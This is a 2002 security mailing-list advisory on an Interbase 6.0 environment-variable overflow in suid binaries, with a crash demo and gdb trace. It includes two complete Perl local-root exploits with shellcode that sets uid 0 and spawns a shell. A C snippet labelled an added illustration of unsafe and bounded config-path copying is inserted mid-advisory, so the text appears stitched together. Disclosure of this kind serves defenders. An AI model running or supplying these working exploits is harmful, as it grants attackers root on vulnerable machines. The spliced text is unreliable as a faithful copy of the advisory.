[UNIX] Interbase malloc() Security Issues (INTERBASE)
From: support@securiteam.com  Date: 06/23/02
From: support@securiteam.com To: list@securiteam.com Date: Sun, 23 Jun 2002 21:52:30 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Interbase malloc() Security Issues (INTERBASE)
------------------------------------------------------------------------
SUMMARY
<http://www.borland.com/interbase/> Interbase is a high-performance,
cross-platform, SQL standards-compliant relational database. A security
vulnerability in the product allows local attackers to overflow an
internal buffer and have the program execute arbitrary code.
DETAILS
Vulnerable systems:
* Interbase version 6.0-1
Interbase-6.0-1.i386.rpm provided with Mandrake 7.2 contains an issue when
reading the environment variable "INTERBASE". This issue is demonstrated
below.
[dotslash@ghetto dotslash]$ export INTERBASE=`perl -e 'print "A" x 500'`
[dotslash@ghetto dotslash]$ /usr/local/interbase/bin/gds_drop
Segmentation fault
This issue results in a malloc() overflow.
The following suid root binaries are potentially exploitable.
/usr/local/interbase/bin/gds_drop
/usr/local/interbase/bin/gds_inet_server
/usr/local/interbase/bin/gds_lock_mgr
(gdb) r
Starting program: /usr/local/interbase/bin/gds_drop
Program received signal SIGSEGV, Segmentation fault.
0x400a0832 in ptmalloc_init () at malloc.c:1696
1696 malloc.c: No such file or directory.
in malloc.c
(gdb) bt
#0 0x400a0832 in ptmalloc_init () at malloc.c:1696
#1 0x400a4e64 in malloc_hook_ini (sz=364, caller=0x40092571) at malloc.c:1856
#2 0x400a0f8d in __libc_malloc (bytes=364) at malloc.c:2798
#3 0x40092571 in _IO_new_fopen (
filename=0xbfffd65c 'A' <repeats 200 times>..., mode=0x80583c0 "r")
at iofopen.c:50
#4 0x0804a244 in ISC_get_config ()
#5 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
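The bug class the backtrace points at, as an added illustration rather than Interbase code (the buffer size, function names and config file name are assumptions, not the product's real values): an environment value copied unchecked into a fixed-size buffer before fopen(), beside a bounded version that rejects the advisory's 500-byte value instead of overflowing.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CFG_PATH_MAX 256      /* assumed buffer size, not Interbase's real one */
#define DEFAULT_ROOT "/usr/local/interbase"

/* Vulnerable pattern (illustration only, never called): no length check, so a
 * 500-byte INTERBASE value overruns the caller's fixed-size stack buffer. */
void get_config_unsafe(char out[CFG_PATH_MAX])
{
    const char *root = getenv("INTERBASE");
    strcpy(out, root ? root : DEFAULT_ROOT);
    strcat(out, "/isc_config");
}

/* Hardened pattern: bounded scan, explicit size check, reject rather than
 * truncate. Returns 0 on success, -1 if the value does not fit. */
int get_config_safe(const char *root, char *out, size_t outsz)
{
    const char suffix[] = "/isc_config";   /* sizeof() includes the NUL */
    size_t rlen = 0;
    if (root == NULL || root[0] == '\0')
        root = DEFAULT_ROOT;
    while (rlen < outsz && root[rlen] != '\0')   /* never scan past outsz */
        rlen++;
    if (rlen + sizeof(suffix) > outsz)
        return -1;
    memcpy(out, root, rlen);
    memcpy(out + rlen, suffix, sizeof(suffix));
    return 0;
}

/* 1 if get_config_safe() accepts this root into a CFG_PATH_MAX buffer. */
int accepts_root(const char *root)
{
    char out[CFG_PATH_MAX];
    return get_config_safe(root, out, sizeof out) == 0;
}

/* Reproduces the advisory's 500 x "A" value (constructed sample input). */
int long_value_is_rejected(void)
{
    char big[501];
    memset(big, 'A', 500);
    big[500] = '\0';
    return !accepts_root(big);
}
```

Compile it with a main() that passes getenv("INTERBASE") to get_config_safe(); get_config_unsafe() is there only to show the shape of the bug and should never be linked into anything.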
Impact:
A local user can gain root privileges.
Vendor status:
The vendor has been contacted; however, no official response has been
received as of today.
Exploit (gds_drop):
#!/usr/bin/perl -w
#
# gds_drop exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
# - Developed in the Snosoft Cerebrum test labs
# - (http://www.snosoft.com) - overflow found by KF
#
# coded by stripey - 15/06/2002 (stripey@snosoft.com)
#
($offset) = @ARGV,$offset || ($offset = 0);
$sc = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";
$ENV{"FOO"} = $sc;
$buf = pack("l",(0xbffffdc0+$offset))x86;
$buf .= "A";
$ENV{"INTERBASE"} = $buf;
exec("/usr/local/interbase/bin/gds_drop");
Exploit (gds_lock_mgr):
#!/usr/bin/perl -w
#
# gds_lock_mgr exploit for Interbase 6.0 linux beta
#
# - tested on redhat 7.2
#
# - Developed in the Snosoft Cerebrum test labs
# - (http://www.snosoft.com) - overflow found by KF
#
# Note: We cannot attach to an interactive shell so it
# will execute /tmp/sh instead...
#
# coded by stripey - 15/06/2002 (stripey@snosoft.com)
#
($offset) = @ARGV,$offset || ($offset = 0);
$sc = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/tmp/sh";
$ENV{"FOO"} = $sc;
$buf = pack("l",(0xbffffdc0+$offset))x86;
$buf .= "A";
$ENV{"INTERBASE"} = $buf;
exec("/usr/local/interbase/bin/gds_lock_mgr");
ADDITIONAL INFORMATION
The information has been provided by <mailto:dotslash@snosoft.com> KF.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.